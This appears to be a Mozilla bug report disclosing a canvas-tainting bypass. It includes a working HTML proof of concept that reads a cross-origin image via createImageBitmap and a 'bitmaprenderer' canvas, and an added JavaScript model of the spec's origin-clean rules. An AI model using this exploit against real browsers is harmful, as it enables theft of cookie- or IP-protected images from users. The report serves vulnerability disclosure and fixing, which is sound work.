Bug 1526218 Comment 0 Edit History
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36
Steps to reproduce:
If the crossorigin attribute is not specified for an image, the image may be
rendered in a bitmap canvas; the data can be accessed by JavaScript.
A proof of concept is shown below.
```html
<html><body>
<script charset="utf-8">
// Called from the <img> onload handler with `this` bound to the image element.
function getData() {
  createImageBitmap(this, 0, 0, this.naturalWidth,
                    this.naturalHeight).then(function(bmap) {
    var can = document.createElement('canvas');
    var ctx = can.getContext('bitmaprenderer');
    ctx.transferFromImageBitmap(bmap);
    // Expected to throw SecurityError for a cross-origin image; it does not.
    document.getElementById('result').textContent = can.toDataURL();
  });
}
</script>
<!-- Cross-origin image loaded without a crossorigin attribute. -->
<img src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/>
<br/><textarea readonly style="width:100%;height:10em" id="result"></textarea>
</body></html>
```
Actual results:
The image, which should not be accessible to JavaScript from origins other than
https://duckduckgo.com, is in fact rendered in the tainted canvas and its
base64-encoded contents are displayed.
Images on external domains protected by cookies or IP whitelisting can
therefore be stolen using Cross-site Request Forgery even if the target server
does not give CORS access to other domains.
Expected results:
An error should have been thrown similar to the error shown when rendering tainted canvases in a 2D context:
"The operation is insecure."
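As an added illustration that is not part of the bug report, the following JavaScript models how the HTML spec's origin-clean flag should propagate through the calls the proof of concept uses (image load with or without a crossorigin attribute, createImageBitmap, the 2D drawImage path and the bitmaprenderer transfer), so that toDataURL() is refused for a cross-origin image. All function and object names are hypothetical stand-ins for the browser APIs and no real pixel data is handled.

```javascript
// Added model (not the bug report's code) of the HTML spec's "origin-clean"
// flag across the calls the PoC uses; names are hypothetical, no real pixels.
class SecurityError extends Error {
  constructor(message) { super(message); this.name = 'SecurityError'; }
}

// Same origin = same scheme and host (host includes the port).
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.host === ub.host;
}

// An <img> is origin-clean if same-origin with the document, or if it was
// requested with a crossorigin attribute (CORS mode) AND the server granted
// access. A plain cross-origin load, the PoC's case, is never origin-clean.
function loadImage(docOrigin, src, { crossorigin = null, corsAllowed = false } = {}) {
  const originClean = sameOrigin(docOrigin, src) || (crossorigin !== null && corsAllowed);
  return { src, originClean };
}

// createImageBitmap(): the bitmap inherits the source's origin-clean flag.
function createBitmap(source) { return { originClean: source.originClean }; }

function createCanvas() { return { originClean: true }; }

// 2D drawImage(): a non-clean source taints the canvas permanently.
function drawImage(canvas, source) {
  if (!source.originClean) canvas.originClean = false;
}

// bitmaprenderer transferFromImageBitmap(): the canvas now displays the
// transferred bitmap, so it must take over that bitmap's origin-clean flag.
function transferFromImageBitmap(canvas, bitmap) {
  canvas.originClean = bitmap.originClean;
}

// toDataURL(): refused on a tainted canvas, as the 2D context already does.
function toDataURL(canvas) {
  if (!canvas.originClean) throw new SecurityError('The operation is insecure.');
  return 'data:image/png;base64,PLACEHOLDER'; // encoding not modelled
}

// Replays the PoC's load -> createImageBitmap -> transfer -> toDataURL path
// and reports whether the read-out is blocked as the spec requires.
function pocIsBlocked(docOrigin, imgSrc, loadOpts) {
  const canvas = createCanvas();
  transferFromImageBitmap(canvas, createBitmap(loadImage(docOrigin, imgSrc, loadOpts)));
  try { toDataURL(canvas); return false; } catch (e) { return e instanceof SecurityError; }
}
```

Under these rules the PoC's sequence yields a tainted canvas and a SecurityError, which is the behaviour the expected results describe; a load with a crossorigin attribute is only clean when the server actually grants CORS access.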